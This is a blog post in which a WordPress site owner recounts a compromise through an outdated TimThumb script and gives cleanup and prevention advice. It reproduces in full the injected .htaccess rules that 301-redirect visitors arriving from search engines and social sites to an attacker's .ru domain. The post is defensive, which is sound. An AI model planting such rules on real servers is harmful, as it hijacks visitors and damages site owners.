Timthumb Vulnerability: Your Site Security Could Be Compromised

Nobody likes one of those days - when you wake up to see that your website’s security is compromised. Hacked or close to it.

Well, I just had one of those days (and on a weekend!).

Thanks to the participants of the Blogging Tips 101 Contest. They were the ones who reported to me first that they could not direct their friends to their contest post and they can’t access their contest posts as well.

At first I took a couple of those emails lightly and told them that it could be a temporary issue and asked them to try again later. I was able to load my blog(s) both in the front end and the back end without any problems. So I didn’t take it seriously.

Then the number of emails I got from other people increased. Everyone were complaining that my site was redirected to a strange domain which didn’t load at all.

This is what happened

Since I realized that the issue is getting serious I dived in to explore the issue. I found that there were some nasty lines of code in my .htaccess file. Following is the code just in case anyone is curious (or may need it in future, although I wish it never happens).

<pre>RewriteEngine On RewriteCond %{HTTP_REFERER} ^.* google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn| netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search| metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail| yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte| webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast| entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde| findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick| terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero| clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet| fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase| schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv).(.*) RewriteRule ^(.*)$ http://uaroyalys-daliachu.ru/industry/index.php [R=301,L] RewriteCond %{HTTP_REFERER} ^.* (web|websuche|witch|wolong|oekoportal|tonline|freenet|arcor|alexana|tiscali| kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista| passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe| sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice| exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek| mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited| jaan|qp|rtl|search-elgium|apollo7|bricabrac|findloo|kobala|limier|express| bestireland|browseireland|finditireland|iesearch|irelandinformation|kompass| startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden| allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.*) RewriteRule ^(.*)$ http://uaroyalys-daliachu.ru/industry/index.php [R=301,L]</pre> <p></p>
Looks nasty isn’t?

What the code basically does is, it hijacks my search engine and external traffic. So if someone finds my blog’s pages through search engines (all major and unknown search engines are listed in the code) or if someone clicks on a direct url to one of my blog posts (as it would happen if a contest participant sends an email to his friend with a link to his contest post), people will be directed to the following url

http://uaroyalys-daliachu.ru/industry/index.php

The thing is that the above domain is blacklisted. So basically all my search engine and direct traffic were ending up on a dead page.

What I did

As a tensed website owner, all I did was to delete those lines of code, save the .htaccess file and checked if the redirect was still in place. I also cleared my browser cache and found that the problem was solved.

I did a google search to one of my review posts and YES I could load the page correctly from Google SERP.

I breathed and started doing my regular work. And in about 10 minutes I got another email that the issue was not solved yet. I asked that reader to clear his browser cache and try again, but still no luck.

I went back to my .htaccess files and those lines of code were back there. I felt as if I was being haunted or something.

Tim thumb script was the blacksheep

Well not exactly. I had to spends hours on chat with my hosting provider Hostgator, cleaning up and other “this and that” stuff. Ultimately this is the response (in a short form) from Hostgator:

Your account was compromised through direct exploit of the timthumb script. This script is used in gallery management.

What is Tim Thumb?

Here’s the original definition:

A small php script for cropping, zooming and resizing web images (jpg, png, gif). Perfect for use on blogs and other applications.

Developed for use in the WordPress theme Mimbo Pro, and since used in many other WordPress themes.

As you can read, many themes and plugins are using this script, if they’re in need to deal with thumbnails.

I doubted Thesis theme

Now since I’m using Thesis theme on all my websites, I thought that Thesis theme was the one that had the outdated Tim thumb script. Also because Thesis theme was the one common thing with all the websites - I suspected some plugins, but I was not using those plugins on all my sites.

I Googled a bit and found that Thesis theme does not permit this issue. However I went ahead and posted a thread in their forum just to confirm. And yes I learned for sure that Thesis theme could not be the problem.

It is because Thesis theme uses its own version of Timthumb script which does not fall into this vulnerability issue.

The original cause

The technicians at Hostgator did a great job in combing through my files to spot the issue. And here’s the reply:

After reviewing the logs provided I see that the website was compromised using the timthumb script found in the theme dailyedition. Below is the related log showing the malicious user pulling the avatar2.php file on to the account which was later used to compromise the account. As you can see the GET request was made via the wp-content/themes/dailyedition/thumb.php file.

OK I’m glad that I now know the root cause. But at the same time, I was really upset because of the time and effort it took to even to find out the cause.

I’m sure not all bloggers are technically skilled to understand php scripts and vulnerability issues.

Bullet points

You need to be aware that the timthumb script is used widely by many free and even some premium themes and plugins.

You need to make sure that the version of the timthumb script you have is up-to-date. This is how the security of my sites was compromised - just because I had an outdated version of the script.

It is not necessary that the (outdated version of the) script has to be in your active themes or plugins. It can be in one of your inactive themes/plugins and can still cause vulnerability issues. So look out for the bunch of unused themes and plugins you have installed in your site’s folder.

I know this is all overwhelming and upsetting. You might have the following questions in mind.

How would you know if I have Timthumb script in any of the themes or plugins you have?

Go to the control panel of your hosting account. Go to File Manager. You will usually have a search option. Search for timthumb.php or thumb.php. If you find that the script is used by any theme or plugin that you are not using, simply delete that particular theme/plugin (the folder).

What if the Timthumb script is present in a theme I’m using?

In this case, you need to make sure that the script is up to date (that is, the latest version). The official updated code can be obtained from here.

This is a tiring process. I can’t remember to check often.

Yes I understand. There is a WordPress plugin for the purpose. Timthumb Vulnerability Scanner. The plugin will automatically check everyday if your timthumb script is up-to-date. If not, you can update with a click.

OK but there’s one more thing. If you’re using Thesis theme you should not use this plugin. It is because Thesis theme uses its own version of the script so that it does not run into this issue at all. But the plugin just checks for the version number and will prompt you to update. If you update, you will lose the script that is Thesis-specific and will have the generic Timthumb script. You will have issues with thumbnails and later on you may run into vulnerability issues as well.

On the other hand, if you’re not using Thesis theme (and I think Genesis and Headway themes are also safe), in particular, if you’re using any free theme make sure you click “Upgrade” if you find any outdated versions while scanning with the plugin.

Something more

It is also good to use some sort of security plugin to make sure you know when there arises a threat. I’m using WordPress Firewall 2.

Takeaway

It is absolutely not enough if you just write blog posts. Running a blog or a website needs something more. Either, you should equip yourself with the knowledge needed on the tech side.

Or you should outsource the task to a friend or someone you trust.

On a side note, I would like to hear more about this issue. If you know more share it in the comment so that it might be useful to others to keep their websites safe. Thanks.

And, don’t forget to share this post and show some social media love. Your friends/followers will surely appreciate that; of course, me too!